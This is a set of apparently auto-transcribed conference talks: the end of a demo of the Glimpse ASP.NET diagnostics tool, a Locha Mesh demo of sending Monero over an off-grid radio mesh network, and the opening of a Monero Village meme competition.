But the other interesting thing that you can do here is, let's say you happen to be using log4net or NLog, who's using one of those frameworks? Anyone? Cool. You could actually set those up to output to the trace writer. And if you do that, it will show up in this tab. So you'll actually be able to see all of those trace statements and all of your existing infrastructure show up here filtered to this request. Again, save you having to trawl through log files to try and pick out what were the trace statements that actually built this request. So there's a few other different tabs here. I'm not going to go into every single one of them, but there's two left that I want to show you. We don't really build modern applications these days or modern websites without some sort of Ajax at their core. Who has, in the websites that they may have been a part of or built in the past... has anyone... I was going to ask the question differently, but who's actually used some sort of Ajax inside of their sites? Okay, I think that's pretty much anyone. Does anyone want to be the person to say, you know, they've rebelled against Ajax? Anyone? I might give you something free. It might be a slap, but that's all right. No? Okay, cool. So what we actually do is we have pages that use Ajax, and you can actually see what we've done is we've altered this sample here that John Galloway built to have this little news ticker that spins around in the background pinging the server every 10 seconds for a new news article. Not rocket science, I know, but I prefer spending my time building Glimpse rather than much more advanced samples. So what we can actually do is come in here and actually click on the Ajax tab, and we can actually see the Ajax requests that are actively going on on this page. And so we thought, I think I might have mentioned to Nick after we started, but still inside of that five weeks. Wouldn't it be cool if we could actually show all of this data that I've just showed you for all of the Ajax requests that have gone on to make this page? Why does it have to be restricted to the actual main page that you're actually seeing here? And he was like, that's a good idea. And I was like, thanks, B1. No one's seen Bananas in Pyjamas. That's right. So what we can actually do here is I can come in and click on inspect, and now our context is actually switched. And you haven't seen too much of a visual change here. We're going to work on improving this. But if you bear with me, we are actually now contextually switching. We're looking at an Ajax request. And now we're looking at news. So if I switch back, that was what the old request looked like. And we can see that that's what we're looking at. But I'll come back to Ajax and actually select one of my requests. We can see that context change. And I can actually come into, let's say, the routes tab. And I can actually see that this is the actual controller for the route that was selected. And these are the parameters that you've passed in. So even though my routing table had home and index as the default, according to what was passed in by the query string, home and news were the actual ones that were picked up. So it's starting to get really powerful. And I can go back here and reset and actually prove to you that if we come back here, back to routes, you can see home and index. That's pretty cool. So who thinks that's pretty cool? Can I get a couple of hands? Yeah, cool, cool. So the other thing I want to show, this is a bit ambitious. Okay. So and it may not work.
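For reference, the "home and index" defaults he points out on the routes tab come from the standard route registration, which in an MVC 3 project like this one sits in Global.asax.cs and looks roughly like the sketch below (not the sample's exact code):

    using System.Web.Mvc;
    using System.Web.Routing;

    public static void RegisterRoutes(RouteCollection routes)
    {
        // "Home" and "Index" are only fall-back values; a request for the
        // News action (the ticker's Ajax call) overrides the default, which
        // is exactly what the routes tab showed for that request.
        routes.MapRoute(
            "Default",
            "{controller}/{action}/{id}",
            new { controller = "Home", action = "Index", id = UrlParameter.Optional });
    }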
So you have to bear with me, but I think it's going to work somehow. So I remember probably, when would have it been? Maybe three days before that release that we did in Las Vegas. And I was sitting somewhere with Nick and I said, wouldn't it be cool if we could have glimpse for the mobile, so that you could actually see glimpse pop up in the bottom of your mobile phone and actually flick through the tabs and see the data. Now, who thinks that would be a good idea? Cool. I like the enthusiasm for the idea. But one thing we thought about was I don't want to look at all of that data on this little phone. Okay. Because that's a hell of a lot to fit on that little phone. Okay. So what we decided to do, and this feature was kind of facilitated by some of the stuff we were doing with Ajax, is keep the phone idea as in I want to keep profiling it. But I actually want to see that data on my computer here. So I'm doing mobile development and I'm here on my computer. So I start it up. I then pick up my phone and go to the web host. I actually want to see that data within glimpse here. Could we do that? Let's find out if it actually worked. So what I'm going to do is I'm going to come back to this page over here and let's just go to this page as a starting place. I'm going to minimise this a little. What I can actually do is I can come to this history tab. Now, if you forgive me, there's already a bit of data in here because this page has been sitting in the background. But what we can actually do is see that as we navigate around, and I actually want this one, that our request will actually pop into this page. Okay. So can we all see that these requests are stacking up here for the navigation that I'm making? So what I can actually do is I can come to any of these and you can actually see we've even got Ajax requests in here. Is Ajax, this one's true. I actually want to go back to this request that I made a couple of minutes ago and I actually want to click on it and I can actually start inspecting that particular request. Same deal. If I go to routes, I can actually see store details, which isn't I'm on store browse at the moment. So I can see this historical request. So that's cool in of itself because I can let's say you navigate it around something weird happened. You moved on a page. It resolved itself and you're like, hey, wait, what went on? I want to go back and see that. So we allow that. But then what I can actually do is, and this is where the crazy live demo isn't going to work or isn't not. So I can actually come in here and you're going to have to bear with the latency. But did anyone see a change there? So keep an eye out again. Anyone see another change? What we actually did is this safari came up. So what I'm actually doing here, and as long as our speeds keep up, I'm actually inspecting in real time what I'm actually doing on this mobile phone. And now I can change the name of these sessions if I wanted to actually be iPhone, but I can actually see that. I think that's really cool. Who thinks that's cool? Yeah, useful? Yeah, okay, cool. So what I'm actually going to do is I'm going to prove to you that this is coming from the iPhone and I'm going to prove to you that it's doing that by going over to request and actually saying that the user agent here is indeed iPhone. 
So what we've just done is we've broken all rules of the universe here and we've actually said I want to collect all of this data that's happening on this remote device, okay, and I want to see that server data, that server context displayed here in this page for me now. That's a fairly big leap forward in terms of how we think about debugging diagnostics and how we think about all of this context. Another interesting use case that's facilitated by this and you're going to have to stretch your thoughts a little bit for this and I think someone else has just popped in here. Let's see if we can watch them navigate around while I'm talking. What we've actually done is facilitated pretty much remote debugging. Now, has anyone actually tried to do like breakpoint remote debugging before? Of those people, keep up your hand if you actually thought it was fun. Okay, good, I'm not going to have to slap anyone. So what we've actually done is we've facilitated remote debugging and what I can actually do is think of this for a use case. One of your customers rings you up and says, hey, I've got a problem and you've gone, okay, cool, replicate your problem and they're talking you through, trying to send you screenshots, all of this sort of stuff. What I can actually do is I can come in here and go, all right, I can watch you in real time. You can click a button somewhere in your website and turn glimpse on in a right only capacity so they can't see any of this data. But then I can sit here as a developer and actually inspect their traffic and actually see what's going on with their requests. Okay, and we've got a circular ring buffer so we only keep the last 50 requests by default. So in this case, it hasn't actually been able to find that historical request because there's other traffic going on on this side at the moment. But that's something that we can actually do and that's really interesting. So coming back to what we're doing here, let me see if I can get this right, shift F5. So moving on, oh wait, one more thing. Okay, I almost forgot this, maybe not because I built a slide in about it, but anyway. One of the insight that we had was that all of this information is really cool. But in some ways, you've got to still try and go through and find the information that you're after. And we all know though that there's a couple of these data points that are really important and that we would really care about on a more frequent basis. So we did that and what we came up with was what you're seeing down the bottom. So you would have seen before when I brought it up in localhost, you would have just seen the icon and you would have seen a little few colored bars. But what we've done here is we've got HUD, heads up display, and what we've actually got is all the most important bits of information from the requests that we've actually made. This is really important because what we've actually done is we're now seeing on every page that we navigate to how long it took, how long it spent over the network, on the server, what control or an action it actually hit. We can see how long the DB queries took, how many queries they were at a glance, so I can see if any page is acting weirdly. And what I can actually do is I can come into any of these and actually hover over them and get more information. And probably one of the most interesting ones in this case is I can actually see how long the various key events inside of ASP.NET took and what queries were associated with those different actions. 
I think that's pretty cool. Who thinks that's cool? Yeah? Okay, cool. Who thinks they might actually use that? Okay? Yeah, okay, thought so. So that's HUD. So when I asked before if people hadn't seen HUD, that's why I was a little bit excited when people said no. And what we can actually do here is let's say we come across to here and I actually want to go back to the home page. And one last thing is we can actually see our AJAX request showing up live here in this toolbar without needing to go anywhere else. I can see them as they happen on the page. And I can actually get more information down here so I can actually see how big the payload request, whether 200s or 400s or 500s or whatever you may have, gets or posts or whatever else. Now, this is still an initial cut of this, but eventually you'll be able to click on those and you'll actually be able to drill down into the more detailed information on this stuff. This is brand new. It's only been released for about three days now. Okay? And we think that's pretty exciting because this is a vision of our systems that we've never had before. Okay? So, oops. Okay. So, what do we have now? Okay? Just quickly before I move on, who likes what they've seen in general? Okay. Cool, cool. Who's actually going to go off and download Glimpse Now and put into their project? Okay. Good to see. Good to see. I've been, I'm doing my job well. Okay? So, a realization that we've had, okay, and you guys may have already connected the dots, but what we have is information at different levels. Okay? And imagine, if you will, that previously breakpoints and log files was like the one foot view of debugging. Okay? So, if I wanted to get down and actually have a look at what was actually going on down here, that's what I would actually use breakpoints for or log files. But let's say I said, let's hop up in a plane and fly the 10,000 foot view over my code or over my executing system. What would that look like? And to us, okay, that looks like HUD. So, that looks like that bar down the bottom of your page, which is pulling out all the most important bits of information. Next, if we said, well, what happens if we fly that plane a bit lower? What does the landscape look like? That looks like timeline, because we're able to grab all of the key events, represent that on the page geographically, and actually show you what's going on. Then we have the 5,000 foot view, which is the majority of the rest of the tabs. Then the 2,000 foot view, which is like the trace tab. Okay? And then we can go, we follow that all the way down to our current existing tools, okay? Like breakpoints and log files and stuff like that. We've also had a realization that we have different modes of development that we're in, okay? Different stages of our lives. So, who at one point in their life was a learner with ASP.com and MVC? Everyone, okay? Who's been a debugger? So, who's trying to figure out what was going on with any framework or some part of their system? Okay? And who's had none of those problems and they're just developing awesome stuff? I'd hope everyone would put their hands up. Can I get a couple of hands? Awesome stuff. Who's been developed? Okay, one guy up the back. You're my friend. Okay? So, what is valuable about this? Okay? If we recognize that we go through these different modes of development, what it means for Glimpse is that when we're thinking about what features and whatever else to provide, we can provide features that are targeted to those different modes. 
So, something like the execution tab is fantastic for when you're learning, so you can actually get a visible picture of what's actually going on. And I know we've had people we've trained, okay, back when we were still working in New York, where the week before we tried, you know, the slide approach to teaching them about MVC. But then we went and showed them Glimpse and they're like, smack in the head, I understand now what you're actually trying to say, okay? And they can actually see that adding that filter to that action is where this thing is actually picked up. Try putting that all on paper, or trying to put breakpoints everywhere to trace that flow — it's really difficult. That also happens to help when you're debugging, so you've got a problem. But the other realization is that when you're in the development mode — i.e. you don't currently have a problem, but you're just trying to, you know, do development — there's still key information that Glimpse gathers that is important to you. And that's where something like HUD comes in and can actually show you all of that information. Another important realization is that Glimpse has turned into a diagnostics platform, and that there is actually a need for this platform out there in the wild. So if you take away the tabs that Glimpse provides by default — so get rid of MVC, Entity Framework, all of this sort of stuff — what we have is this cool icon that sits in the bottom right-hand corner that you can click on, that opens up and has no tabs. Okay? Yay, big deal, they say. But what we actually have on the back end is a mechanism by which you can easily create your own tabs and see those actually pop up in your system. And I knew we were starting to cut time close, but I am actually going to show you this. Okay? And hopefully it's all going to work okay. So this is basically something that I worked on a little earlier just because I thought I might be pushed for time. So I'm actually going to stop this and we're going to come in here, File, Add, Class. Okay, and we're going to call this GlimpseModuleTab. So I actually just want to see all of the modules that are currently registered in the system, because for me that's super important. Okay? So what I actually do here is I can come in and just inherit from AspNetTab, okay, which is a Glimpse concept. If we have a look, ReSharper is going to tell me that's from Glimpse's extensibility namespace. And if I actually implement this, it's going to tell me that you need to implement these two members. One is the name that we want our tab to have, and so I'm actually going to call that Modules. Okay, and the other one is an object. That's all Glimpse wants me to do: just please give me an object, I'll figure out the rest. So what we've actually done — and I'm not going to get you guys to watch me code, but if we come along here — what we've actually done is, the first thing, we pull out the HTTP context, because that's the thing that can give us access to the modules. We then go into the application instance and pull out the modules. We create a result object that we want the list to go into. And then we create a list of these anonymous objects with an index of how they're ordered, because it actually turns out the order is important here, the name, and what the data type is. So, not rocket science, I hope we'll all agree with that. So I can actually now come in, start debugging this. That's all I've done.
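For reference, here is a minimal sketch of the tab just described. The class and member shapes follow the talk; the namespaces and the GetRequestContext<HttpContextBase>() helper reflect the Glimpse extensibility API of that era as best I can reconstruct it, so treat this as an illustration rather than the exact demo code:

    using System.Collections.Generic;
    using System.Web;
    using Glimpse.AspNet.Extensibility;
    using Glimpse.Core.Extensibility;

    public class GlimpseModuleTab : AspNetTab
    {
        // The name Glimpse shows on the tab.
        public override string Name
        {
            get { return "Modules"; }
        }

        // Glimpse just wants an object back; it works out how to render it.
        public override object GetData(ITabContext context)
        {
            // Pull out the HttpContext, because that gives us access to the
            // application instance and its registered HTTP modules.
            var httpContext = context.GetRequestContext<HttpContextBase>();
            var modules = httpContext.ApplicationInstance.Modules;

            // Anonymous objects with an index (order matters for modules),
            // the registered name, and the concrete type.
            var result = new List<object>();
            for (var i = 0; i < modules.AllKeys.Length; i++)
            {
                var key = modules.AllKeys[i];
                result.Add(new { Index = i, Name = key, Type = modules[key].GetType().FullName });
            }
            return result;
        }
    }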
I haven't registered anything in an XML file or anything like that. And what Glimpse actually does is it goes away and is able to pick up this tab. And what we can actually see is that here's this tab. It shows up in here, and there it is. We've just gotten data out of our system. Now I agree this is a fairly trivial example, but imagine you've got a shopping cart or something in your e-commerce system or some sort of A-B testing system that you've homegrown or whatever else. And you want to get access to why is something showing and something else isn't. Or what is actually in my shopping cart. Or what current security policies have come into effect to display me the page that I'm actually seeing right now. This is the sort of stuff that when we start thinking about a platform, we can actually get access to or that we would start thinking about. And the other thing that we start thinking about is that why don't we have different plug impacts for different frameworks. So that's something that you can do yourself, but just like what we've seen with MVC and NE framework, we could start having that for inhybernate. Or we could start having that for ELMA. I don't want to see any exceptions right there in my page. And this is really important because if we as a community decide that these type of diagnostics are important, let's invest together. Let's not reinvent the wheel on every single different platform and framework and whatever else to figure out how we're going to show diagnostics information. Let's band together and make that happen. So that in essence, it facilitates a multi-framework ecosystem. And we have information that is targeted at understanding. I.e. log files in my opinion aren't necessarily targeted at understanding, they're more targeted at confusion. How confused can we make this person? So target understanding. We also have something that's cross-browser, cross-platform and full stack. So not that I showed it today, but if you think that this framework stuff is important and this framework level insights is important, it turns out that's important on the server, but it's also important on the client. And what if we could have client tabs as well? That show how backbone or knockout or stuff like that is operating. And as it turns out as well, the client is actually fully decoupled from the server. So we actually have different implementations on the server back end. So ASP.net is one of them, PHP and whatever else. So closing up now, what's this all really about? I think this is, we're trying to save you time. Trailing through log files or scratching your head over breakpoints isn't what you're about. So we're trying to take that heavy lifting off you and actually show you in plain English what's actually going on here. In turn, that saves you money because you're not having to spend your time trying to figure out how the system is working or what's going wrong where. And in the end, it's also about making you kick ass. Because if we can help you get to this information sooner and this understanding better, it's only going to make you that much better of a developer. And be able to come back to your clients and say, look what we've been able to do or look at I've solved your problem. So we've talked about the current approach, the fact that something's missing. What important questions we should be asking ourselves? How Glimpse solved some of those problems? We've had a look at some demos. We've now had a little bit of a look at what we've got. 
And what is this all really about? At the end of the day, I think I've already convinced you to try it. But this is where I was going to do my real pitch to tell you to try it. So I'm going to skip that. Just try it. Give it a go. Virtually no harm. I said virtually. No harm can come from trying it. It's just DLLs. It's not going to break your system. It's at getglimpse.com. Really easy to remember. And Glimpse is open source. All of this stuff that you've seen, we're not charging for it. Nick and I, we started now free time. We decided these were things that developers needed. They're not optional. So please go ahead and try it. If you like what you see, jump in. This is only made possible by the efforts of, I don't know, 50 to 100 different people who have contributed over the last two years to make Glimpse what it is today. So if you want to get involved, please help out and give it a go. Go forth and be awesome. Please leave feedback. Okay. That's really important. And thank you very much for coming along. Oh, and one more thing. Please stick around. If you want to know more about getting involved with open source and how open source projects and stuff like that operate, Nick is actually going to be talking about that coming up next. So thank you very much.
|
With the state of diagnostics on the web being where it is, we are left needing to perform a job that is much harder than it should be. Too often, the tools we are provided with only show a part of the picture, leaving us to simply guess what might be happening behind the scenes. Glimpse is an open source project that aims to change the way we think about diagnostics and the frameworks we interact with. After releasing Glimpse at Mix 11, Glimpse has become a tool that is used daily by tens of thousands of developers around the world. Learn how to use Glimpse to reveal what is happening within your ASP.NET MVC and WebForms sites. See what tools are included out of the box and how you can easily extend it to suit your needs.
|
10.5446/50666 (DOI)
|
Hello, thank you to the Monero Village organizers and the Monero community for inviting us to be part of this amazing conference and for the opportunity to show you what we are doing at Locha Mesh. We are going to show you a demo of the Locha Mesh, which is a community-driven, open source software and hardware project. It started two years ago with the idea of making a decentralized, censorship-resistant network for payments and communication without internet — for disaster-hit countries and for privacy-concerned individuals and groups who would like to keep their communications and payments as private as possible. Mesh networks have existed for decades now, but we focus our efforts on making one that doesn't rely on seed nodes, bootstrap nodes, servers, or intermediaries at all. Each Locha Mesh node is independent and keeps enough information to be able to deliver messages and data through paths and hops to their destinations, without internet at all. Well, Luis, who is the CTO, will show you a demo of a Monero transaction that is going to take place from a completely off-the-grid computer — one that is only connected to the Locha Mesh network — to a remote Monero node. Luis? Good afternoon and welcome everyone. I would like to start by thanking all the Monero community, and especially those who supported us through Monero's CCS proposals. And, as Randy was saying, I'm Luis, the CTO and co-founder of Locha Mesh. I would like to show you a demo running the Monero graphical user interface and the Monero daemon in the same network, in this case the Locha Mesh network. You can see in the picture here the environment. On the right side, you can see the server with two network interfaces: one is connected to the internet and the other to the Locha Mesh. The Monero daemon is running on this server. The network interface for the Locha Mesh is this one. And on the left side is my laptop, represented there as N1, using the LaunchPad — the LaunchPad is this red board, as you can see in the webcam. This red board is the network interface for the Locha Mesh, using this address. Between them, we have a node whose network address we don't know, but we don't care either, because it just helps to find the path between my laptop and the server. Okay. Shut off the other microphone. You have two of them, I think. Or is it — it is down, right? I don't know if it's... What? No, check the other microphone in case it is on the other computer. I don't know if it's working or not. I'm closing the microphone on the other computer. Okay, okay. Continue. Yeah, sorry. Someone wanted to do that. Okay. So, we can start with the terminals. In the right window, I have an open terminal to the server running the Monero daemon. And I have configured the network interface for the Locha Mesh. We can check. Okay. So, the interface is this one. And on the left side, I need to check. Okay. This is correct. Okay. Before executing the Monero GUI, the Monero graphical user interface, we must make sure we have the configuration file ready with the server address (a rough sketch of what goes in there follows below). This is the Monero config file. Okay. This is the address of the Monero server, and this is the port. So, we can start the GUI. Okay. Check. Check. Get waves. Okay. The wallet is synchronizing. This can take a while. Okay. And it's ready. So, the next step is: Randy, can you send me some Monero, please? Sure.
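The exact file isn't readable on screen, but the point of that configuration is simply to aim the wallet at the daemon's RPC endpoint over the mesh interface. A minimal sketch — with placeholder addresses, Monero's stock default RPC port, and the CLI equivalents of what the GUI settings do — might look like this (the addresses are purely illustrative, not the ones used in the demo):

    # On the server, expose monerod's RPC on the mesh-facing interface:
    monerod --rpc-bind-ip <mesh-interface-address> --rpc-bind-port 18081 \
            --confirm-external-bind --restricted-rpc

    # On the off-grid laptop, point the wallet at that daemon over the mesh;
    # the GUI's remote-node settings store the same address and port:
    monero-wallet-cli --daemon-address <mesh-interface-address>:18081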
So, now that the wallet is synchronized over the Locha Mesh to a remote Monero node, he can create an address to receive payments without having any connection to the Internet. He's only connected to the Locha Mesh through the radio device — in this case, he's using a LaunchPad, which is for development, but you can also see one of the revisions of the hardware we are building there in the webcam. So, he's now going to share a Monero address with me to get the payment. So — he copies and shares it — and what we are going to see now is that I myself, who am connected to the Internet, am going to broadcast a transaction to the receiving address Luis has shared with me. And the Monero daemon, which Luis is running on a server connected to the Internet and also to the Locha Mesh, will see the transaction that I'm making on the Internet. I'm going to set this to a good number so you can see it. Okay. Send. Now, my transaction is being sent over the Internet. It's done. Enter password. Okay. Send. Now, what is going to happen is that the Monero daemon that Luis has connected to both the Internet and the Locha Mesh, which is a peer-to-peer mesh network, is going to see this transaction in the Monero mempool. And it knows that this transaction belongs to this user, who is connected to the Monero daemon over the Locha Mesh only. So, now that the transaction has been broadcast to the Internet and the Monero daemon running on the server sees it, it's going to populate, or share, this information with the user. Transactions. Yeah, it's sent. Let's see. So, well, you can see there. Yeah, it's running. What's the noise there? There you can see in the background of the user interface — in the terminal — that the interface is communicating with the Monero daemon over the Locha Mesh only. And now it has received the incoming transaction to its wallet. And this information he has received over the Locha Mesh. The Locha Mesh is a peer-to-peer, decentralized mesh network that only needs another node in range. So, it needs to be in range in order to be part of the same mesh. And when there are more meshes, isolated in cities or distributed in different countries, what we will have is bridges or long-range radios that will connect one mesh with another — over the Internet as a bridge or gateway, or also with long-range radio. So, we're going to connect cities with each other, and we'll have this mesh network not isolated anymore in each city but interconnected, to make a huge network of devices that are capable of delivering messages, data, and information — like in this case — all over the world. So, once everything is running inside the mesh, you won't need to go to the Internet anymore, because miners will be inside the Locha Mesh, servers will be running inside the Locha Mesh, and Monero remote nodes will also be there — wallets, everything will run there. You won't need to use the Internet anymore. The advantage of this is that, as you can see, you can have a developer LaunchPad board that you can build yourself in your house, and you won't need to be identified or KYC'd by anyone in order to be able to use the Locha Mesh. So, we are making custom hardware, and this is important for us because, well, this custom hardware that you can see there — the hardware revision we have — is the Turpial, and it's made out of pieces and components that you can buy online today. So, you can build yourself a version of it with off-the-shelf parts too.
So, if you do this and you build it yourself in your house, you won't need to identify yourself, share your ID, or scan your face with any service provider, ISP, or government in order to be able to communicate and make use of applications on this Locha Mesh network. It is important for us to make the hardware — the custom hardware — because that enables us to develop the firmware from scratch and make it open source: to make it publicly available for everyone to use, so that you can build your own or buy the ones that we are going to sell, instead of using already existing radio communications equipment, most of which — if not all of which — depends on closed-source flashing tools and proprietary firmware. The devices communicate with each other over radio in the unlicensed ISM bands, 915 MHz and 868 MHz. The routing protocol that we are building is based on AODVv2, and we have full IPv6 support. So, any application or server software that can work with IPv6 addresses can run on the Locha Mesh without any extra work. Luis is going to show you, for example, SSH access, web servers, Monero block sync — not only the wallet itself is going to work inside the Locha Mesh — messaging apps, remote nodes; you will be able to access your computer over the Locha Mesh without having to use the internet. So, you won't expose your home IP address, you won't expose your phone's IP address, which is connected to your identity — you will be able to use the Locha Mesh to do all this. So, now Luis is going to show you how you can run a web server on one computer and access that website from another computer over the Locha Mesh, completely off the grid, without having to use the internet at all. So, a very basic web server. I need to launch the browser. So, here is the browser. Here is the address of the server and the port. Okay. Okay. That's it. So, this is an example of how you can run a web server on a computer, a server, or a Raspberry Pi in your house, and you can access that service or that computer over SSH or HTTP, and you can synchronize your wallet — you can even synchronize your full node — over the Locha Mesh, in a peer-to-peer, decentralized mesh network that is private. And the data transmitted can be encrypted, because we are using the unlicensed ISM bands, which allow you to encrypt the information you are sending. So, it is also private. That is why it is so important for us that the Monero community — and individuals — decided to support us through the CCS crowdfunding system that they have; we understand that the Monero community is a privacy-focused community, and we are too. So, we are not only enabling people to use Bitcoin and Monero without internet, we are also letting people stay in contact with their loved ones in disaster-hit countries, for example, or during censorship, internet shutdowns and blockades, or infrastructure failures. So, this is a community-driven project which is open source, and we invite everyone in the community of makers, hackers, and everyone who cares about privacy and the freedom of using your money to join us on our GitHub, which is github.com/btcven/locha, and we invite you to join us in la lucha — the fight for the freedom of money.
So, in this demo we wanted to show you what we are working on. As said, you can build the do-it-yourself version of the devices yourself, but we are also going to sell the Turpial device, which is a battery-powered mobile hotspot that is going to give you access over Wi-Fi. It is a hotspot with a Wi-Fi AP (access point) that you can connect to with up to four mobile phones, and you can also connect it to a server, like in this example, through a USB cable. So, if you have enough density and there are enough devices in range around you, you will be able to chat, make payments, and sync your full node over the Locha Mesh. What we are also working on is the radio module itself. The radio module that goes in the Turpial is going to be available in other form factors, so you can use a Raspberry Pi HAT, for example, add it to a Raspberry Pi, and it is going to be able to communicate over the Locha Mesh with others in order to offer services — for example a server, a wallet sync service, an Electrum server, or a remote Monero node that others can use — and you will be able to get paid for that. So, you will be able to get paid using Monero (for example via RPC pay), fiat, or Bitcoin or the Lightning Network, and you are going to get payments for the services you are providing to others inside the Locha Mesh, as a way to incentivize you for running these services inside the Locha Mesh. So, you will be able to build the devices yourself, you will be able to buy the radio modules that we are going to build, or you can buy the more consumer-ready, newbie-friendly device, which is the Turpial, and so you can have all your family, relatives, and friends carry a Turpial device around with them, so they are able to chat with you or use the services you are providing to them from your house on your Locha Mesh-enabled computer. So, this is what we wanted to show you, and this is what we've been working on for the past two years. Thanks to communities like the Monero community itself, we've been able to do this mostly on the donations and grants that we have received, but we also have a company — the hardware company — because we want to make devices and sell them to the everyday users who are not going to build them, but who are going to buy them in order to be a node inside the mesh, relay messages for others, and maybe get payments for providing that service too. So, if you are interested in supporting us, you can make a donation, or you can join us on GitHub and help us test the DevKit devices that we expect to have pretty soon, or you can pre-order the Turpial devices that we expect to have ready for shipment in early 2021. Thank you very much. Thank you everyone, Luis. Thank you very much, everyone. Thank you. Hope you enjoy the rest of DEF CON. Hope you enjoy the whole weekend, which has been very interesting and exciting, and we hope to see you again. If you have any questions, you can reach out to us at locha.io, and you can find us on Twitter and also on GitHub — as I said previously, on Twitter we are Locha underscore io. Thank you everyone. Thank you for attending. Thank you.
|
Locha Mesh: Monero off the Grid
|
10.5446/50659 (DOI)
|
but it's not just a meme competition today. Of course, it's a mean meme competition. So you got the best people prepared here. We have people joining in, Diego left us, but we have Scott joining us. We have VT nerd. We have, of course, the National Security Agency giving their best memes today. So I guess before we start, I just wanna make sure that everyone is sort of set up and ready to go to the greatest extent. And that, yeah, I guess we can have time to introduce each other's too. This meme competition will be very similar to the meme competition that we did for Moneroversary. So if you saw that, you are ahead of the game. I will distribute meme templates for all of our participants to fill. And then after they fill, I will give a chance for the audience to vote. Instead of last time where we had a poll, I think we're just gonna do a thing where people mash their votes in the chat and we'll see how that goes. Because we only have 30 people watching. If we had thousands of people, then I think a poll would work. But we can just see how many people vote for which specific number in the chat. Among Lee and Scott, have you had a chance to review the instructions so far? Yeah, I read the read, sorry. But the read me, no issues, straightforward. All right, perfect, that's good news. I guess I have all this. Thank you so much for joining us, perfect timing. Yeah, I think people are gonna be excited for this meme because why wouldn't you? Of course everyone's gonna be excited. I am just getting everything situated on my end because I don't have anything to help me out. This is a very complicated process. Memes take a lot of work to get ready. Yeah, I'm super high tech. He's like PowerPoint, everything is crazy. Just like last time, we were using PowerPoint to arrange the memes for people to vote on. Nothing but the best for the community here. Okay, looks like I'm almost situated. Vic has not joined us yet, which is odd because he destroyed us last time. Vic will be joining us. He's probably busy sending out a tweet from the Monero memes account, I'm sure. Sorry, not Monero memes, but the Cake Wallet account, which is basically a meme account too. I'm sure you're aware. So, title view, let's get everything going here. All right, I think everything is situated on my end now. I know you're all waiting for me. I guess, if it's just, oh, Vic, perfect timing. We were waiting for you. Sorry, I'm late. No, it's all good. Vic, have you had a chance to log into NextCloud and see all the files that are there? Yeah, I see nine folders. Okay, perfect, nine folders. I did not peek. You did not peek. Yeah, so this- That's not why I'm late. If someone does suspiciously well, you can blame it on them cheating this time. They were given access to the ability to cheat this time. So, hopefully they didn't. We're gonna have to trust that the Monero community is a trustworthy bunch, otherwise, big problem. So, that being said, let us get started, shall we? I'll set a timer. People are sending messages. Hey, all, yes, Vic. So, under the meme competition folder, which you're not able to see if you are just watching the live stream, but otherwise, you can go through under, you know, the Defcon 2020, you have a list of nine folders. I am now giving everyone permission to open up the first folder, folder number one, and there is an image in there. I am going to screen share this for everyone who is in the live chat. It is a meme. 
You have a few minutes to, you have a few minutes to make the best thing out of this meme that you can. Actually, screen one is actually the preferred. All right, so I'm sharing this with YouTube. You should be able to see, I might have to go back and forth here, of course, with my different streaming computer. No, never mind, it does appear properly, perfect. So, all right, so that's a meme that you're gonna be building on. You have five minutes, so let me start the timer, and then you will put the meme in the same exact folder that you did, that you, sorry, you'll put the meme that you create in the same folder. Make sure you assign a random number to it. That's the one that the participants will vote on. And then, of course, include your name, so I know who ultimately wins. That way you can't take credit, even if you don't win, because that would be horrible, of course. All right, what are our first impressions of this meme? There's a lot that can go on here. I've never seen this meme. I have no idea what to do with it. Yeah, that's kind of the fun, I think. Sometimes that's funny. It is sometimes funny when everyone does a completely different meme and some of them aren't even funny or relevant. What do people in the audience think of this meme? What do we think of two guns, well, three guns in a car, one says something, other two guns turn around, and then the other one's silenced? Okay. So what format should it be saved in, the same JPEG? JPEG or PNG, whatever you want, and then upload it to the same folder. I will share it and arrange it such that people can see different numbers and vote on them and things. I hope the naming convention is... But make sure that you name the meme, the number one, colon, a random number, and then your name. Okay, Mac doesn't let me do colon, so I want file names. Yeah, you can do a dash or a dot. Doesn't, you know, maybe a period is fine too. We have no comments, there we go. Good meme, thank you, Andres. I appreciate you liking my meme choice here. We'll see if it's a good meme, depending on what people submit. Of course, I'm wearing my putting the fun and fungibility shirt today. Saved the normal Monero one for Sunday when I'm giving a talk about mineral coin-based output, which are much less fun than memes, I would say. But, so be it. This is a problem with the meme competition sometimes. It's all funny, everyone will laugh when the memes are done, but in the moment, everyone's busy just working on them, trying to think of something good, and they're all stressed out. I need a co-host on here just to do banter back for it. All right, that's submitted. Cool, I see yours. Now I get to do all the work of arranging them in a way where people can vote. Without giving too much away, Vic, this is a Monero meme you came up with? Oh, I couldn't think of anything Monero related. I'll lose that one. I don't know how. Somebody makes that into a Monero meme, hats off to them. This is a tough one. I just went the general route. Okay, yeah, hold on. Somebody on Twitter just corrected somebody. It's just saying it's verge currency, not it's at verge currency, not at verge, like it matters. Sorry. Oh gosh, what did you do, Vic? Are you embarrassing us? No, I'm just reading. Is this from the cake wallet account? No, nothing to do with cake or my account, just random tweets. I know you're secretly making a verge wallet in the background. I know you're all in the gulls to get the trust in our community. Exactly. Hopefully they'll accept me one day. 
It's a very prestigious community. You've got to build from the bottom up. You've got to start with the basic stuff like Monero. You've got to make wallets that anybody will use. Monero is such a coin that everyone treats like anything else. And eventually, you'll be good enough for the verge community. Eventually, with enough persistence. Welcoming to criticism. Anyway, that's not talking. Who's all on? Who is everybody? OK, looks like someone submitted what is the naming convention.png. Name it 01- or whatever. And then put in a random number. And then put in your actual name. The reason for the random number is because that's the number I'm going to give the audience to vote on. And that way, once I figure out which one wins, I'm able to figure out which one actually wins. And then I know the name then. Who submitted it? Yeah, I was wondering where you saw the what is naming convention. I mean, that was close enough. Who picks the winners? We're going to have to chat spam the winner. And if no one votes, then it's just going to be me. Which is biased because I know who picked the memes in, I guess. So people better vote. So you're saying this is centralized, huh? It is a very centralized. Well, that's why I thought we were just going to have a number and then no name. And then we would say, oh, that was my number. I guess anybody could claim the number in the end, though. Yeah. So this way, Justin can't pick favorites, huh? Of course. All right, Scott, how are you doing? Good, I am literally just a couple of clicks away from uploading one click away. In the meantime, look at the shirt I got from Cypher Market, Diego. Very nice. Diego is just with us. Walking all the noobs with how to use Monero. Did you say just use K-Quality? That's it. He went through the Monero GUI. He didn't go through the K-Quality. You said noobs and easy. He was complaining about the GUI as he was using it. I told you, for a K-Quality, I wondered a slogan to be, for noobs by noobs. It's a good way of putting it. Force refresh, Shane. Let's see. Oh, I see it. Download. It's fine. It's not named correctly, but it's fine. OK, you have three numbers to choose from. You only need to get better at general. Oh, actually, Isthmus just submitted it. It's never mind. All right. Isthmus. OK. It's one of the most popular ones. I'm not sure. I don't know. I don't know. I don't 